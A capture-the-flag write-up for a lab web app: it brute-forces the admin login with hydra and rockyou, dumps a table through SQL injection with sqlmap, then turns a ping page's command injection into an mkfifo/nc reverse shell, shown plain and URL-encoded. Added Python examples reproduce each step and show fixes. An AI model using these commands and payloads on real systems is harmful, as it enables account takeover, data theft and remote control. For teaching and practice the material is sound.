
Clicking eGA movies gives us the link http://172.17.17.119:3000

The footer says that we cannot create an account with the username `admin`, but let's try it anyway and see what happens.

We get the error `possibly duplicate username`, which confirms that an `admin` account already exists.
So now we have a username; the remaining problem is the password. Let's brute-force it using the rockyou wordlist.

I keep two rockyou wordlists: the normal rockyou and a copy of it in reverse order. I always run them in parallel to save time, since we don't know at which line the password sits.
Above I show the reverse-rockyou run; you can ignore the error or strip it off if you like, or just use the command `hydra -l admin -P reverseRockyou.txt 172.17.17.119 -s 3000 http-post-form "/login:name=^USER^&password=^PASS^:F=Invalid credentials" -f -q`. The `F=` part tells hydra which response text means a failed login, so it must match exactly what the application returns for a wrong password; `-f` stops as soon as the first valid pair is found.
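To make the failure-string logic of that hydra run explicit, here is an added example (not part of the original writeup) in Python. The login call is pluggable, so the demo runs offline against a constructed `fake_login` stand-in that returns the same `Invalid credentials` text as the target; wrap a real `requests.post` in a function with the same `(user, password) -> body` signature to use it for real. It also shows the single-process equivalent of running rockyou and its reversed copy side by side: trying candidates alternately from the front and the back of the list.

```python
"""Login brute force with a failure-string check, in the spirit of the
hydra http-post-form run above. Added example, not part of the original
writeup. The HTTP layer is pluggable so the demo runs offline against a
constructed fake login function."""
from typing import Callable, Iterable, Iterator, Optional

FAILURE_STRING = "Invalid credentials"  # same marker hydra's F= option uses


def interleave_ends(words: list[str]) -> Iterator[str]:
    """Yield candidates alternately from the front and the back of the list.

    This is the single-process equivalent of running rockyou and its
    reversed copy in parallel: wherever the password sits, the number of
    attempts is at most about half the list, plus one.
    """
    lo, hi = 0, len(words) - 1
    while lo <= hi:
        yield words[lo]
        if lo != hi:
            yield words[hi]
        lo += 1
        hi -= 1


def brute_force(post: Callable[[str, str], str], user: str,
                candidates: Iterable[str]) -> tuple[Optional[str], int]:
    """Try each candidate; stop at the first response lacking FAILURE_STRING
    (hydra's -f behaviour). Returns (password or None, attempts made)."""
    attempts = 0
    for pw in candidates:
        attempts += 1
        body = post(user, pw)
        if FAILURE_STRING not in body:
            return pw, attempts
    return None, attempts


# --- constructed stand-in for the target's /login endpoint -----------------
REAL_PASSWORD = "1234568787"  # the value recovered in the writeup


def fake_login(user: str, password: str) -> str:
    """Mimics the app: same failure text for a bad password, a token on success."""
    if user == "admin" and password == REAL_PASSWORD:
        return '{"token": "constructed-example-token"}'
    return "Invalid credentials"


# Constructed mini-wordlist with the real password near the end, the case
# where the reversed wordlist would win.
WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon", REAL_PASSWORD, "zzz"]


def demo() -> tuple[int, int]:
    """Return attempts needed front-to-back vs. interleaved from both ends."""
    _, forward = brute_force(fake_login, "admin", iter(WORDLIST))
    _, both_ends = brute_force(fake_login, "admin", interleave_ends(WORDLIST))
    return forward, both_ends


if __name__ == "__main__":
    fwd, both = demo()
    print(f"front-to-back: {fwd} attempts, both ends: {both} attempts")
```

Against a real target, rate limiting and account lockout are the things to check before letting this loop over fourteen million lines; the CTF box here had neither.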

Here we find the password `1234568787`. Now let's log in as administrator using the credentials we obtained.
> username: admin
> password: 1234568787
> For the IAA CTF the password here will be `killer`

Here we successfully log in as admin and receive the token. There is also a search function that lets us look up users by their IDs.

Searching for id 1 returns the user admin, which means this function queries the database directly with our input. Let's try SQLi.

The displayed data does not change, so it's time to look at what is actually happening on the wire; I am going to use Burp Suite.

In Burp we can see what happens with /search: the response is an internal server error, which is already a strong indication of SQLi, and it carries the SQL error message `unrecognized token` (the error SQLite raises when a stray quote leaves a string literal unterminated). Now we are sure there is an SQLi in this function.
Now it's time to exploit the SQLi. The simple way is to right-click the request in Burp and save it to a file.

I saved it as `search`. Use this command to enumerate the databases: `sqlmap -r search --dbs`. With `-r` sqlmap replays the saved request as-is, token header included, so the injection is tested inside the authenticated session and sqlmap works out which parameter is injectable on its own.

Now let's list the tables: `sqlmap -r search --tables`

The interesting one was `Websites`, which should reveal the hidden websites. So let's dump that table: `sqlmap -r search -T Websites --dump`
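To see why a single quote produced that `unrecognized token` error and how the same parameter lets sqlmap read a different table, here is an added example (not the challenge's code) that rebuilds the /search behaviour against a constructed in-memory SQLite database. The `users` and `Websites` tables, their columns and the sample rows are assumptions chosen to resemble what sqlmap dumped; the parameterised `search_fixed` is the corrected form.

```python
"""Reproduce the /search SQL injection locally against a constructed SQLite
database. Added example, not the challenge's code: the table and column
names are assumptions chosen to resemble what sqlmap dumped."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the challenge database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users VALUES (1, 'admin'), (2, 'bob');
        CREATE TABLE Websites (id INTEGER PRIMARY KEY, url TEXT);
        INSERT INTO Websites VALUES (1, '/svdctyfyfcewiofrwehgtretjguhbkemcvnytj');
    """)
    return con


def search_vulnerable(con: sqlite3.Connection, user_id: str) -> list[tuple]:
    """How the endpoint evidently behaves: the id is pasted into the SQL text."""
    query = f"SELECT id, name FROM users WHERE id = {user_id}"
    return con.execute(query).fetchall()


def search_fixed(con: sqlite3.Connection, user_id: str) -> list[tuple]:
    """Parameterised query: the id is bound as data and never parsed as SQL."""
    return con.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchall()


def probe(con: sqlite3.Connection, payload: str) -> str:
    """Return what the server leaks for a payload: the rows, or the DB error text.
    A stray quote yields SQLite's 'unrecognized token' error, the message seen in Burp."""
    try:
        return repr(search_vulnerable(con, payload))
    except sqlite3.OperationalError as e:
        return f"error: {e}"


def steal_websites(con: sqlite3.Connection) -> list[tuple]:
    """UNION-based extraction by hand: what sqlmap's -T Websites --dump automates.
    The injected SELECT must return as many columns as the original query (two)."""
    return search_vulnerable(con, "0 UNION SELECT id, url FROM Websites")


if __name__ == "__main__":
    con = make_db()
    print(probe(con, "1"))          # normal request
    print(probe(con, "1'"))         # breaks the query -> unrecognized token
    print(steal_websites(con))      # private URL pulled from another table
    print(search_fixed(con, "1'"))  # fixed version: bound as text, no error, no rows
```

The fix is not the error handling but the bound parameter: hiding the 500 would only turn this into a blind injection, which sqlmap handles just as well.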

We get a private URL; let's open it in the browser: `/svdctyfyfcewiofrwehgtretjguhbkemcvnytj`

We get a page that is used to ping hosts. Let's first check whether we can reach localhost.

It works. Now it's time to check for command injection: chain a simple command such as `ls` after the host and see whether its output comes back.

Time for a reverse shell. Let's use this command (the address and port after `nc` must be those of the listener you start on your own attacking machine before sending the payload):
`rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.17.17.119 9090 >/tmp/f`

Because the command travels inside a URL parameter, we URL-encode it first. It becomes:
`rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%20172.17.17.119%209090%20%3E%2Ftmp%2Ff`
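To show what makes the ping page injectable, what the fix looks like, and how the encoded payload above is produced, here is an added example (not the challenge's code; the writeup does not say what the server is written in, so the handler is a hypothetical reconstruction in Python). `run_unsafe` executes user input through a shell exactly as the page evidently does, `ping_args_safe` is the hardened form, and `encode_payload` regenerates the URL-encoded string from the plain reverse-shell command.

```python
"""The ping page's weakness and its fix, plus the payload-encoding step.
Added example, not the challenge's code: the handler is a hypothetical
reconstruction of how such a page behaves."""
import re
import subprocess
from urllib.parse import quote, unquote

# Simple allow-list: IPv4 literals and plain hostnames only.
HOST_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def ping_command_unsafe(host: str) -> str:
    """Vulnerable pattern: user input spliced straight into a shell command line."""
    return f"ping -c 1 -W 1 {host}"


def run_unsafe(host: str) -> str:
    """Execute the concatenated string through a shell, as the page evidently does.
    Anything after ';' in `host` runs as its own command, whatever ping does."""
    proc = subprocess.run(ping_command_unsafe(host), shell=True,
                          capture_output=True, text=True, timeout=15)
    return proc.stdout


def ping_args_safe(host: str) -> list[str]:
    """Hardened: validate the host and pass argv as a list, so no shell ever
    parses the input. Raises ValueError on anything outside the allow-list."""
    if not HOST_RE.fullmatch(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "1", "-W", "1", host]


# The reverse shell from the writeup (listener address as given there).
REVERSE_SHELL = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 172.17.17.119 9090 >/tmp/f"


def encode_payload(cmd: str) -> str:
    """URL-encode every reserved character (space, /, ;, |, >, &) so the
    command survives the trip through a query-string parameter."""
    return quote(cmd, safe="")


if __name__ == "__main__":
    # The separator does the damage: 'echo INJECTED' runs regardless of ping.
    print(run_unsafe("127.0.0.1; echo INJECTED"))
    try:
        ping_args_safe("127.0.0.1; echo INJECTED")
    except ValueError as e:
        print(e)
    enc = encode_payload(REVERSE_SHELL)
    print(enc)
    assert unquote(enc) == REVERSE_SHELL
```

Passing argv as a list is the real fix; the regex is defence in depth, since even a well-formed hostname is harmless once no shell interprets it.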

After getting the reverse shell there are two ways to get the flag:
1. Exploiting password reuse.
Testing for password reuse shows that the root password is the same as admin's, i.e. `1234568787`. So just switch user to root and go for the flag.

2. Exploiting SUID binaries.

You can read the flag or escalate privileges as explained at https://gtfobins.github.io/gtfobins/nano/#sudo (that section covers nano run through sudo; the same GTFOBins page also has a SUID section for the case where the binary itself carries the setuid bit).
> Flag : RIDC{6dcd4ce23d88e2ee9568ba546c007c63d9131c1b8b5e26c5f1f4c0e4e5f2f5f0}